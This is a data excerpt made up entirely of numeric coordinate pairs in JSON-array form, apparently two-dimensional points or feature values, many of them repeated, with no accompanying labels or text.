[7.583569459571693, 2.9678320131795166],
[5.483181079034119, 3.3932092599533696],
[6.425951539197719, 3.4605904466592117],
[15.006366271051672, 4.232282823070333],
[6.024029708789503, 2.7765971408513765],
[3.6755430287090185, 2.4658558409523934],
[6.805877015325792, 1.5925707515038552],
[15.272869558340066, 5.179633920566634],
[12.648689092385144, 4.264422651010618],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[2.6640740853075005, 2.3912359557692726],
[3.230417925582914, 3.0172709078239617],
[9.436127302593512, 5.541398982964392],
[4.765886863174591, 2.2246421206661733],
[4.13832415287115, 3.791493370103742],
[6.073933436884495, 2.5749648755014114],
[7.785473193141325, 4.667062798186051],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[7.469449854326634, 5.159645256391554],
[5.926847062929005, 2.550077789090704],
[6.633316773597083, 2.460443387674774],
[7.930783504041922, 6.31551486280533],
[5.425993469713776, 2.3674151211798176],
[4.459870001832672, 1.7285677118659897],
[8.206988166321013, 2.7538312138050416],
[5.435836143120371, 2.8043480606961375],
[3.6755430287090185, 2.4658558409523934],
[6.805877015325792, 1.5925707515038552],
[2.6157741915651846, 3.1088022135528464],
[4.8656085177216335, 3.507236448349241],
[10.026366613585727, 1.8960365443859055],
[8.298445566203704, 1.4267451115017629],
[7.583569459571693, 2.9678320131795166],
[4.765886863174591, 2.2246421206661733],
[6.024029708789503, 2.7765971408513765],
[5.483181079034119, 3.3932092599533696],
[8.206988166321013, 2.7538312138050416],
[5.435836143120371, 2.8043480606961375],
[3.6755430287090185, 2.4658558409523934],
[8.915211259432512, 0.9889547601376892],
[4.8656085177216335, 3.507236448349241],
[10.026366613585727, 1.8960365443859055],
[8.298445566203704, 1.4267451115017629],
[6.024029708789503, 2.7765971408513765],
[8.79909367536444, 4.432608366014386],
[8.426879836837694, 2.0831024928635116],
[4.765886863174591, 2.2246421206661733],
[9.782841374634526, 6.436511752429161],
[8.816728351491637, 5.517350427765949],
[6.073933436884495, 2.5749648755014114],
[9.052150960537846, 0.7674448804270357],
[5.435836143120371, 2.8043480606961375],
[3.6755430287090185, 2.4658558409523934],
[8.79909367536444, 4.432608366014386],
[4.8656085177216335, 3.507236448349241],
[8.298445566203704, 1.4267451115017629],
[3.230417925582914, 3.0172709078239617],
[8.915211259432512, 0.9889547601376892],
[8.426879836837694, 2.0831024928635116],
[4.765886863174591, 2.2246421206661733],
[9.782841374634526, 6.436511752429161],
[8.816728351491637, 5.517350427765949],
[6.073933436884495, 2.5749648755014114],
[9.052150960537846, 0.7674448804270357],
[6.805877015325792, 1.5925707515038552],
[8.206988166321013, 2.7538312138050416],
[7.42290814377523, 2.4182881151332105],
[5.926847062929005, 2.550077789090704],
[6.633316773597083, 2.460443387674774],
[2.6157741915651846, 3.1088022135528464],
[5.483181079034119, 3.3932092599533696],
[10.026366613585727, 1.8960365443859055],
[8.09611116766466, 2.3148350927200396],
[3.6755430287090185, 2.4658558409523934],
[5.425993469713776, 2.3674151211798176],
[6.073933436884495, 2.5749648755014114],
[9.436127302593512, 5.541398982964392],
[6.024029708789503, 2.7765971408513765],
[5.435836143120371, 2.8043480606961375],
[6.805877015325792, 1.5925707515038552],
[8.816728351491637, 5.517350427765949],
[4.13832415287115, 3.791493370103742],
[2.6640740853075005, 2.3912359557692726],
[3.230417925582914, 3.0172709078239617],
[3.6755430287090185, 2.4658558409523934],
[4.8656085177216335, 3.507236448349241],
[6.073933436884495, 2.5749648755014114],
[7.785473193141325, 4.667062798186051],
[10.898829990027707, 4.394411988981465],
[8.813658596800783, 4.40731941077611],
[7.466702255730219, 4.246506577865299],
[8.0310976897579, 4.565308046256245],
[12.080015421555425, 5.049617522440796],
[17.40712445864718, 6.0786148727775835],
[3.6755430287090185, 2.4658558409523934],
[6.805877015325792, 1.5925707515038552],
[8.09611116766466, 2.3148350927200396],
[2.6157741915651846, 3.1088022135528464],
[6.073933436884495, 2.5749648755014114],
[10.026366613585727, 1.8960365443859055],
[8.298445566203704, 1.4267451115017629],
[7.583569459571693, 2.9678320131795166],
[5.483181079034119, 3.3932092599533696],
[9.436127302593512, 5.541398982964392],
[6.024029708789503, 2.7765971408513765],
[4.13832415287115, 3.791493370103742],
[2.6640740853075005, 2.3912359557692726],
[4.765886863174591, 2.2246421206661733],
[5.435836143120371, 2.8043480606961375],
[8.816728351491637, 5.517350427765949],
[7.785473193141325, 4.667062798186051],
[7.42290814377523, 2.4182881151332105],
[5.926847062929005, 2.550077789090704],
[5.425993469713776, 2.3674151211798176],
[8.09611116766466, 2.3148350927200396],
[7.583569459571693, 2.9678320131795166],
[5.483181079034119, 3.3932092599533696],
[6.425951539197719, 3.4605904466592117],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[5.926847062929005, 2.550077789090704],
[9.313523271207726, 7.409010602010248],
[7.930783504041922, 6.31551486280533],
[5.425993469713776, 2.3674151211798176],
[4.459870001832672, 1.7285677118659897],
[6.425951539197719, 3.4605904466592117],
[17.831733344604118, 5.601097356442306],
[8.79909367536444, 4.432608366014386],
[6.805877015325792, 1.5925707515038552],
[8.915211259432512, 0.9889547601376892],
[8.298445566203704, 1.4267451115017629],
[9.052150960537846, 0.7674448804270357],
[11.646036843330032, 5.28959128564458],
[14.651849458814455, 6.156396527676787],
[8.426879836837694, 2.0831024928635116],
[6.024029708789503, 2.7765971408513765],
[8.816728351491637, 5.517350427765949],
[16.27085066460655, 7.219369562609158],
[4.13832415287115, 3.791493370103742],
[9.436127302593512, 5.541398982964392],
[4.6484348578469525, 4.498128244166764],
[3.230417925582914, 3.0172709078239617],
[4.765886863174591, 2.2246421206661733],
[5.435836143120371, 2.8043480606961375],
[7.785473193141325, 4.667062798186051],
[5.926847062929005, 2.550077789090704],
[6.633316773597083, 2.460443387674774],
[5.425993469713776, 2.3674151211798176],
[8.09611116766466, 2.3148350927200396],
[7.583569459571693, 2.9678320131795166],
[5.483181079034119, 3.3932092599533696],
[15.006366271051672, 4.232282823070333],
[5.435836143120371, 2.8043480606961375],
[15.272869558340066, 5.179633920566634],
[11.599493458855028, 4.6319068463010415],
[12.648689092385144, 4.264422651010618],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[2.6640740853075005, 2.3912359557692726],
[3.230417925582914, 3.0172709078239617],
[4.765886863174591, 2.2246421206661733],
[4.13832415287115, 3.791493370103742],
[7.785473193141325, 4.667062798186051],
[8.206988166321013, 2.7538312138050416],
[7.42290814377523, 2.4182881151332105],
[5.926847062929005, 2.550077789090704],
[6.633316773597083, 2.460443387674774],
[5.425993469713776, 2.3674151211798176],
[10.026366613585727, 1.8960365443859055],
[7.583569459571693, 2.9678320131795166],
[5.483181079034119, 3.3932092599533696],
[6.024029708789503, 2.7765971408513765],
[8.79909367536444, 4.432608366014386],
[6.805877015325792, 1.5925707515038552],
[8.298445566203704, 1.4267451115017629],
[8.915211259432512, 0.9889547601376892],
[8.426879836837694, 2.0831024928635116],
[9.782841374634526, 6.436511752429161],
[8.816728351491637, 5.517350427765949],
[8.206988166321013, 2.7538312138050416],
[6.024029708789503, 2.7765971408513765],
[8.79909367536444, 4.432608366014386],
[10.026366613585727, 1.8960365443859055],
[8.915211259432512, 0.9889547601376892],
[8.426879836837694, 2.0831024928635116],
[9.782841374634526, 6.436511752429161],
[8.816728351491637, 5.517350427765949],
[6.073933436884495, 2.5749648755014114],
[9.052150960537846, 0.7674448804270357],
[6.805877015325792, 1.5925707515038552],
[2.6640740853075005, 2.3912359557692726],
[15.272869558340066, 5.179633920566634],
[11.599493458855028, 4.6319068463010415],
[7.366786430174513, 6.428369989001501],
[4.13832415287115, 3.791493370103742],
[9.436127302593512, 5.541398982964392],
[10.868473100078905, 6.500681652985371],
[4.6484348578469525, 4.498128244166764],
[3.230417925582914, 3.0172709078239617],
[4.765886863174591, 2.2246421206661733],
[5.435836143120371, 2.8043480606961375],
[3.230417925582914, 3.0172709078239617],
[6.024029708789503, 2.7765971408513765],
[8.79909367536444, 4.432608366014386],
[8.298445566203704, 1.4267451115017629],
[9.052150960537846, 0.7674448804270357],
[8.915211259432512, 0.9889547601376892],
[8.426879836837694, 2.0831024928635116],
[4.765886863174591, 2.2246421206661733],
[9.782841374634526, 6.436511752429161],
[16.27085066460655, 7.219369562609158],
[6.805877015325792, 1.5925707515038552],
[17.831733344604118, 5.601097356442306],
[6.024029708789503, 2.7765971408513765],
[6.805877015325792, 1.5925707515038552],
[8.915211259432512, 0.9889547601376892],
[8.75996171977272, 2.4613800757137327],
[9.830856760443089, 3.168670142931533],
[8.298445566203704, 1.4267451115017629],
[9.052150960537846, 0.7674448804270357],
[11.646036843330032, 5.28959128564458],
[14.651849458814455, 6.156396527676787],
[8.426879836837694, 2.0831024928635116],
[10.765350147835402, 4.26355033264317],
[9.782841374634526, 6.436511752429161],
[8.816728351491637, 5.517350427765949],
[16.27085066460655, 7.219369562609158],
[5.665576843540502, 3.3322218039932925],
[5.603685695983892, 3.2451075514789007],
[7.382275307401952, 3.514762773783933],
[7.176117324513632, 3.942691925460738],
[8.21144142645822, 3.37666183586836],
[6.883321149103081, 3.7013844629577264],
[5.132833382217747, 3.156111073426686],
[4.939032982959074, 2.8272859625441624],
[6.024029708789503, 2.7765971408513765],
[8.79909367536444, 4.432608366014386],
[11.646036843330032, 5.28959128564458],
[8.75996171977272, 2.4613800757137327],
[9.830856760443089, 3.168670142931533],
[8.298445566203704, 1.4267451115017629],
[8.915211259432512, 0.9889547601376892],
[10.765350147835402, 4.26355033264317],
[9.782841374634526, 6.436511752429161],
[8.816728351491637, 5.517350427765949],
[9.052150960537846, 0.7674448804270357],
[6.805877015325792, 1.5925707515038552],
[9.782841374634526, 6.436511752429161],
[6.805877015325792, 1.5925707515038552],
[8.75996171977272, 2.4613800757137327],
[8.298445566203704, 1.4267451115017629],
[8.79909367536444, 4.432608366014386],
[8.426879836837694, 2.0831024928635116],
[6.024029708789503, 2.7765971408513765],
[8.816728351491637, 5.517350427765949],
[9.052150960537846, 0.7674448804270357],
[17.831733344604118, 5.601097356442306],
[10.352903816466064, 5.4329619694952],
[8.75996171977272, 2.4613800757137327],
[12.607577814121331, 6.654053135290553],
[10.218332769042606, 4.755288786393186],
[9.830856760443089, 3.168670142931533],
[8.79909367536444, 4.432608366014386],
[14.651849458814455, 6.156396527676787],
[8.426879836837694, 2.0831024928635116],
[10.765350147835402, 4.26355033264317],
[9.782841374634526, 6.436511752429161],
[16.27085066460655, 7.219369562609158],
[8.206988166321013, 2.7538312138050416],
[6.805877015325792, 1.5925707515038552],
[8.09611116766466, 2.3148350927200396],
[8.298445566203704, 1.4267451115017629],
[7.583569459571693, 2.9678320131795166],
[6.073933436884495, 2.5749648755014114],
[17.40712445864718, 6.0786148727775835],
[13.68779991816646, 7.969365452444415],
[12.607577814121331, 6.654053135290553],
[10.218332769042606, 4.755288786393186],
[9.70851317614466, 6.764568760710533],
[11.646036843330032, 5.28959128564458],
[14.651849458814455, 6.156396527676787],
[10.765350147835402, 4.26355033264317],
[9.228222681876002, 4.707914178930707],
[15.006366271051672, 4.232282823070333],
[7.648743254380252, 3.257370873095939],
[15.272869558340066, 5.179633920566634],
[3.1990871251820026, 3.6130256259877207],
[12.648689092385144, 4.264422651010618],
[2.6157741915651846, 3.1088022135528464],
[4.8656085177216335, 3.507236448349241],
[9.436127302593512, 5.541398982964392],
[12.511000378851987, 3.547264743632041],
[5.435836143120371, 2.8043480606961375],
[3.6755430287090185, 2.4658558409523934],
[7.060678719911859, 3.618460185670135],
[17.481680662865287, 8.347867766355318],
[13.68779991816646, 7.969365452444415],
[11.052943486906425, 4.056670488652025],
[12.607577814121331, 6.654053135290553],
[8.991016655478452, 6.881447984734754],
[7.868234704679868, 6.1038468248930515],
[10.352903816466064, 5.4329619694952],
[6.925060823285094, 3.9322925779230595],
[12.390006549779804, 2.8565142569979605],
[9.228222681876002, 4.707914178930707],
[9.436127302593512, 5.541398982964392],
[15.272869558340066, 5.179633920566634],
[7.366786430174513, 6.428369989001501],
[4.13832415287115, 3.791493370103742],
[11.84389834840664, 7.2194803662491545],
[10.868473100078905, 6.500681652985371],
[4.6484348578469525, 4.498128244166764],
[7.785473193141325, 4.667062798186051],
[15.006366271051672, 4.232282823070333],
[7.648743254380252, 3.257370873095939],
[15.272869558340066, 5.179633920566634],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[9.436127302593512, 5.541398982964392],
[12.511000378851987, 3.547264743632041],
[5.435836143120371, 2.8043480606961375],
[11.646036843330032, 5.28959128564458],
[10.352903816466064, 5.4329619694952],
[8.75996171977272, 2.4613800757137327],
[12.607577814121331, 6.654053135290553],
[10.218332769042606, 4.755288786393186],
[9.830856760443089, 3.168670142931533],
[8.79909367536444, 4.432608366014386],
[14.651849458814455, 6.156396527676787],
[8.426879836837694, 2.0831024928635116],
[8.79909367536444, 4.432608366014386],
[8.75996171977272, 2.4613800757137327],
[10.218332769042606, 4.755288786393186],
[11.646036843330032, 5.28959128564458],
[8.426879836837694, 2.0831024928635116],
[10.765350147835402, 4.26355033264317],
[17.831733344604118, 5.601097356442306],
[17.481680662865287, 8.347867766355318],
[10.352903816466064, 5.4329619694952],
[11.646036843330032, 5.28959128564458],
[13.68779991816646, 7.969365452444415],
[20.262525828886847, 4.38253198977739],
[12.607577814121331, 6.654053135290553],
[20.290752230806902, 5.971876134651779],
[10.218332769042606, 4.755288786393186],
[8.79909367536444, 4.432608366014386],
[10.765350147835402, 4.26355033264317],
[9.782841374634526, 6.436511752429161],
[16.27085066460655, 7.219369562609158],
[8.79909367536444, 4.432608366014386],
[11.646036843330032, 5.28959128564458],
[9.830856760443089, 3.168670142931533],
[8.915211259432512, 0.9889547601376892],
[8.426879836837694, 2.0831024928635116],
[10.765350147835402, 4.26355033264317],
[17.481680662865287, 8.347867766355318],
[13.68779991816646, 7.969365452444415],
[11.052943486906425, 4.056670488652025],
[12.390006549779804, 2.8565142569979605],
[8.991016655478452, 6.881447984734754],
[6.925060823285094, 3.9322925779230595],
[9.70851317614466, 6.764568760710533],
[6.318696553751853, 2.6493957765030025],
[9.228222681876002, 4.707914178930707],
[12.607577814121331, 6.654053135290553],
[10.352903816466064, 5.4329619694952],
[9.830856760443089, 3.168670142931533],
[11.646036843330032, 5.28959128564458],
[14.651849458814455, 6.156396527676787],
[10.765350147835402, 4.26355033264317],
[7.817292084856258, 3.0485450300896595],
[3.1990871251820026, 3.6130256259877207],
[12.648689092385144, 4.264422651010618],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[12.511000378851987, 3.547264743632041],
[2.6157741915651846, 3.1088022135528464],
[3.6755430287090185, 2.4658558409523934],
[7.060678719911859, 3.618460185670135],
[17.831733344604118, 5.601097356442306],
[8.79909367536444, 4.432608366014386],
[20.262525828886847, 4.38253198977739],
[11.646036843330032, 5.28959128564458],
[14.651849458814455, 6.156396527676787],
[9.782841374634526, 6.436511752429161],
[8.816728351491637, 5.517350427765949],
[7.897289837095821, 7.843623717963191],
[10.00927361084607, 8.043380871528857],
[11.599493458855028, 4.6319068463010415],
[7.366786430174513, 6.428369989001501],
[4.13832415287115, 3.791493370103742],
[11.84389834840664, 7.2194803662491545],
[4.6484348578469525, 4.498128244166764],
[6.453340793815525, 7.208049672169001],
[7.785473193141325, 4.667062798186051],
[17.831733344604118, 5.601097356442306],
[17.481680662865287, 8.347867766355318],
[10.352903816466064, 5.4329619694952],
[13.68779991816646, 7.969365452444415],
[20.262525828886847, 4.38253198977739],
[20.290752230806902, 5.971876134651779],
[10.218332769042606, 4.755288786393186],
[9.70851317614466, 6.764568760710533],
[11.646036843330032, 5.28959128564458],
[14.651849458814455, 6.156396527676787],
[10.765350147835402, 4.26355033264317],
[9.228222681876002, 4.707914178930707],
[7.142804913450352, 2.3719820232546924],
[11.052943486906425, 4.056670488652025],
[8.54798198686671, 4.392237959001067],
[8.591695637435324, 4.571358857179722],
[6.81037827822504, 2.028443179487512],
[9.70851317614466, 6.764568760710533],
[12.390006549779804, 2.8565142569979605],
[8.991016655478452, 6.881447984734754],
[7.868234704679868, 6.1038468248930515],
[10.791267205626388, 4.524959636297345],
[6.318696553751853, 2.6493957765030025],
[9.228222681876002, 4.707914178930707],
[7.757238842667287, 3.6066908442572694],
[7.897289837095821, 7.843623717963191],
[10.00927361084607, 8.043380871528857],
[7.012638573452989, 7.137474062991739],
[11.84389834840664, 7.2194803662491545],
[10.868473100078905, 6.500681652985371],
[7.366786430174513, 6.428369989001501],
[5.539849214850788, 5.949223698391216],
[9.436127302593512, 5.541398982964392],
[11.599493458855028, 4.6319068463010415],
[7.366786430174513, 6.428369989001501],
[2.6640740853075005, 2.3912359557692726],
[10.868473100078905, 6.500681652985371],
[4.6484348578469525, 4.498128244166764],
[3.230417925582914, 3.0172709078239617],
[4.765886863174591, 2.2246421206661733],
[5.435836143120371, 2.8043480606961375],
[7.785473193141325, 4.667062798186051],
[17.831733344604118, 5.601097356442306],
[17.481680662865287, 8.347867766355318],
[20.262525828886847, 4.38253198977739],
[20.290752230806902, 5.971876134651779],
[12.607577814121331, 6.654053135290553],
[8.991016655478452, 6.881447984734754],
[7.868234704679868, 6.1038468248930515],
[10.352903816466064, 5.4329619694952],
[9.70851317614466, 6.764568760710533],
[14.651849458814455, 6.156396527676787],
[9.228222681876002, 4.707914178930707],
[6.81037827822504, 2.028443179487512],
[11.052943486906425, 4.056670488652025],
[6.318696553751853, 2.6493957765030025],
[8.591695637435324, 4.571358857179722],
[8.475262132319893, 4.397279083129038],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[8.54798198686671, 4.392237959001067],
[7.757238842667287, 3.6066908442572694],
[7.142804913450352, 2.3719820232546924],
[11.052943486906425, 4.056670488652025],
[8.591695637435324, 4.571358857179722],
[6.81037827822504, 2.028443179487512],
[8.991016655478452, 6.881447984734754],
[7.868234704679868, 6.1038468248930515],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[8.54798198686671, 4.392237959001067],
[7.757238842667287, 3.6066908442572694],
[7.142804913450352, 2.3719820232546924],
[11.052943486906425, 4.056670488652025],
[6.318696553751853, 2.6493957765030025],
[8.591695637435324, 4.571358857179722],
[6.81037827822504, 2.028443179487512],
[8.475262132319893, 4.397279083129038],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[8.54798198686671, 4.392237959001067],
[10.573586033422723, 5.889495426088143],
[10.08043825549381, 5.373027602070418],
[7.142804913450352, 2.3719820232546924],
[11.052943486906425, 4.056670488652025],
[8.54798198686671, 4.392237959001067],
[6.81037827822504, 2.028443179487512],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[6.318696553751853, 2.6493957765030025],
[10.08043825549381, 5.373027602070418],
[7.757238842667287, 3.6066908442572694],
[6.018242339961669, 2.455006569825223],
[6.221065720140407, 1.8444794858743812],
[6.441820784103897, 1.8297149833490693],
[7.817292084856258, 3.0485450300896595],
[17.481680662865287, 8.347867766355318],
[13.68779991816646, 7.969365452444415],
[7.868234704679868, 6.1038468248930515],
[6.925060823285094, 3.9322925779230595],
[9.70851317614466, 6.764568760710533],
[6.318696553751853, 2.6493957765030025],
[8.451288396654498, 7.1685106583930445],
[7.012638573452989, 7.137474062991739],
[6.453340793815525, 7.208049672169001],
[11.84389834840664, 7.2194803662491545],
[10.868473100078905, 6.500681652985371],
[7.366786430174513, 6.428369989001501],
[10.00927361084607, 8.043380871528857],
[5.539849214850788, 5.949223698391216],
[7.142804913450352, 2.3719820232546924],
[11.052943486906425, 4.056670488652025],
[8.591695637435324, 4.571358857179722],
[6.81037827822504, 2.028443179487512],
[8.475262132319893, 4.397279083129038],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[6.318696553751853, 2.6493957765030025],
[10.573586033422723, 5.889495426088143],
[10.08043825549381, 5.373027602070418],
[7.757238842667287, 3.6066908442572694],
[7.897289837095821, 7.843623717963191],
[10.00927361084607, 8.043380871528857],
[8.572460333447433, 5.408326049952073],
[6.453340793815525, 7.208049672169001],
[8.451288396654498, 7.1685106583930445],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[5.539849214850788, 5.949223698391216],
[7.897289837095821, 7.843623717963191],
[8.451288396654498, 7.1685106583930445],
[7.012638573452989, 7.137474062991739],
[8.572460333447433, 5.408326049952073],
[6.639913085795089, 4.007152153837444],
[6.453340793815525, 7.208049672169001],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[17.481680662865287, 8.347867766355318],
[13.68779991816646, 7.969365452444415],
[8.79909367536444, 4.432608366014386],
[20.262525828886847, 4.38253198977739],
[12.607577814121331, 6.654053135290553],
[20.290752230806902, 5.971876134651779],
[11.646036843330032, 5.28959128564458],
[14.651849458814455, 6.156396527676787],
[9.782841374634526, 6.436511752429161],
[16.27085066460655, 7.219369562609158],
[13.68779991816646, 7.969365452444415],
[11.052943486906425, 4.056670488652025],
[12.607577814121331, 6.654053135290553],
[7.868234704679868, 6.1038468248930515],
[10.352903816466064, 5.4329619694952],
[6.925060823285094, 3.9322925779230595],
[9.70851317614466, 6.764568760710533],
[12.390006549779804, 2.8565142569979605],
[7.142804913450352, 2.3719820232546924],
[11.052943486906425, 4.056670488652025],
[8.54798198686671, 4.392237959001067],
[8.591695637435324, 4.571358857179722],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[6.318696553751853, 2.6493957765030025],
[7.757238842667287, 3.6066908442572694],
[7.736549504370702, 3.0401062740968237],
[7.428745884499296, 3.948587570104591],
[9.31164605264972, 3.6057299715043056],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[7.3422331382197745, 3.275992682227498],
[5.539849214850788, 5.949223698391216],
[9.215078124413676, 3.8034825172915108],
[7.736549504370702, 3.0401062740968237],
[7.012638573452989, 7.137474062991739],
[8.572460333447433, 5.408326049952073],
[6.639913085795089, 4.007152153837444],
[7.428745884499296, 3.948587570104591],
[8.451288396654498, 7.1685106583930445],
[7.464807214368578, 4.690885029474544],
[9.31164605264972, 3.6057299715043056],
[7.3422331382197745, 3.275992682227498],
[5.539849214850788, 5.949223698391216],
[9.215078124413676, 3.8034825172915108],
[7.897289837095821, 7.843623717963191],
[11.599493458855028, 4.6319068463010415],
[6.453340793815525, 7.208049672169001],
[10.868473100078905, 6.500681652985371],
[7.366786430174513, 6.428369989001501],
[10.00927361084607, 8.043380871528857],
[7.736549504370702, 3.0401062740968237],
[7.012638573452989, 7.137474062991739],
[8.572460333447433, 5.408326049952073],
[6.639913085795089, 4.007152153837444],
[7.428745884499296, 3.948587570104591],
[8.451288396654498, 7.1685106583930445],
[6.48937276124812, 4.800578882043143],
[9.31164605264972, 3.6057299715043056],
[7.3422331382197745, 3.275992682227498],
[5.539849214850788, 5.949223698391216],
[9.215078124413676, 3.8034825172915108],
[7.142804913450352, 2.3719820232546924],
[10.08043825549381, 5.373027602070418],
[7.757238842667287, 3.6066908442572694],
[8.54798198686671, 4.392237959001067],
[10.573586033422723, 5.889495426088143],
[8.475262132319893, 4.397279083129038],
[16.71893425153499, 6.886618893628182],
[16.59452827095705, 7.248826600721748],
[7.757238842667287, 3.6066908442572694],
[8.54798198686671, 4.392237959001067],
[12.78702621798014, 7.022321800762671],
[10.08043825549381, 5.373027602070418],
[17.831733344604118, 5.601097356442306],
[17.481680662865287, 8.347867766355318],
[13.68779991816646, 7.969365452444415],
[20.262525828886847, 4.38253198977739],
[12.607577814121331, 6.654053135290553],
[14.651849458814455, 6.156396527676787],
[7.897289837095821, 7.843623717963191],
[10.00927361084607, 8.043380871528857],
[7.012638573452989, 7.137474062991739],
[8.572460333447433, 5.408326049952073],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[5.539849214850788, 5.949223698391216],
[7.897289837095821, 7.843623717963191],
[8.451288396654498, 7.1685106583930445],
[7.012638573452989, 7.137474062991739],
[6.453340793815525, 7.208049672169001],
[11.84389834840664, 7.2194803662491545],
[10.868473100078905, 6.500681652985371],
[7.366786430174513, 6.428369989001501],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[6.639913085795089, 4.007152153837444],
[8.075345535704072, 1.883180556041472],
[7.428745884499296, 3.948587570104591],
[9.31164605264972, 3.6057299715043056],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[10.751161489077203, 4.225586173294387],
[7.3422331382197745, 3.275992682227498],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[9.215078124413676, 3.8034825172915108],
[7.736549504370702, 3.0401062740968237],
[8.572460333447433, 5.408326049952073],
[6.639913085795089, 4.007152153837444],
[9.31164605264972, 3.6057299715043056],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[7.3422331382197745, 3.275992682227498],
[9.215078124413676, 3.8034825172915108],
[17.831733344604118, 5.601097356442306],
[13.68779991816646, 7.969365452444415],
[20.262525828886847, 4.38253198977739],
[20.290752230806902, 5.971876134651779],
[12.607577814121331, 6.654053135290553],
[8.991016655478452, 6.881447984734754],
[7.868234704679868, 6.1038468248930515],
[9.70851317614466, 6.764568760710533],
[14.651849458814455, 6.156396527676787],
[7.736549504370702, 3.0401062740968237],
[8.075345535704072, 1.883180556041472],
[6.639913085795089, 4.007152153837444],
[7.428745884499296, 3.948587570104591],
[9.31164605264972, 3.6057299715043056],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[9.215078124413676, 3.8034825172915108],
[12.603920074979019, 4.528716381518033],
[7.736549504370702, 3.0401062740968237],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[6.639913085795089, 4.007152153837444],
[10.751161489077203, 4.225586173294387],
[7.428745884499296, 3.948587570104591],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[7.3422331382197745, 3.275992682227498],
[7.905778234791283, 1.7947612929705807],
[9.215078124413676, 3.8034825172915108],
[8.591695637435324, 4.571358857179722],
[8.475262132319893, 4.397279083129038],
[7.757238842667287, 3.6066908442572694],
[8.54798198686671, 4.392237959001067],
[10.573586033422723, 5.889495426088143],
[12.78702621798014, 7.022321800762671],
[12.603920074979019, 4.528716381518033],
[7.736549504370702, 3.0401062740968237],
[7.861346418623317, 2.0914747316056297],
[9.51096699847288, 2.5480332991806334],
[9.09247114452116, 4.0768261627605655],
[9.549239473505697, 3.6282603751507314],
[10.423913162457975, 4.607263376292237],
[11.136964472776878, 4.9173911163438655],
[9.31164605264972, 3.6057299715043056],
[7.916578028132151, 3.1857693626187498],
[8.745112797664264, 3.904397543504395],
[9.418160268699934, 4.337590860271318],
[7.905778234791283, 1.7947612929705807],
[10.751161489077203, 4.225586173294387],
[12.603920074979019, 4.528716381518033],
[7.736549504370702, 3.0401062740968237],
[6.639913085795089, 4.007152153837444],
[7.428745884499296, 3.948587570104591],
[9.31164605264972, 3.6057299715043056],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[7.3422331382197745, 3.275992682227498],
[10.751161489077203, 4.225586173294387],
[7.736549504370702, 3.0401062740968237],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[9.51096699847288, 2.5480332991806334],
[8.075345535704072, 1.883180556041472],
[9.394172311872296, 1.1886529769801988],
[9.31164605264972, 3.6057299715043056],
[9.554736555992315, 1.6223503617210633],
[7.3422331382197745, 3.275992682227498],
[8.83870919041701, 0.8672354821446215],
[8.339558625443825, 1.1524807688385876],
[10.751161489077203, 4.225586173294387],
[16.71893425153499, 6.886618893628182],
[16.59452827095705, 7.248826600721748],
[10.08043825549381, 5.373027602070418],
[10.573586033422723, 5.889495426088143],
[7.736549504370702, 3.0401062740968237],
[7.861346418623317, 2.0914747316056297],
[8.075345535704072, 1.883180556041472],
[9.51096699847288, 2.5480332991806334],
[9.091367959976361, 1.0611075859642212],
[9.394172311872296, 1.1886529769801988],
[9.554736555992315, 1.6223503617210633],
[7.3422331382197745, 3.275992682227498],
[8.83870919041701, 0.8672354821446215],
[7.905778234791283, 1.7947612929705807],
[7.736549504370702, 3.0401062740968237],
[8.256646510635516, 3.5516008947314193],
[9.51096699847288, 2.5480332991806334],
[9.394172311872296, 1.1886529769801988],
[9.09247114452116, 4.0768261627605655],
[9.549239473505697, 3.6282603751507314],
[9.31164605264972, 3.6057299715043056],
[7.916578028132151, 3.1857693626187498],
[9.554736555992315, 1.6223503617210633],
[8.745112797664264, 3.904397543504395],
[8.83870919041701, 0.8672354821446215],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[10.751161489077203, 4.225586173294387],
[16.71893425153499, 6.886618893628182],
[21.33088126083242, 4.112066552358572],
[12.78702621798014, 7.022321800762671],
[22.01908128270974, 3.805279465650763],
[10.573586033422723, 5.889495426088143],
[17.831733344604118, 5.601097356442306],
[17.481680662865287, 8.347867766355318],
[13.68779991816646, 7.969365452444415],
[12.607577814121331, 6.654053135290553],
[20.290752230806902, 5.971876134651779],
[14.651849458814455, 6.156396527676787],
[16.27085066460655, 7.219369562609158],
[15.006366271051672, 4.232282823070333],
[11.599493458855028, 4.6319068463010415],
[12.648689092385144, 4.264422651010618],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[9.436127302593512, 5.541398982964392],
[5.435836143120371, 2.8043480606961375],
[7.785473193141325, 4.667062798186051],
[6.981801980351727, 5.790295382573812],
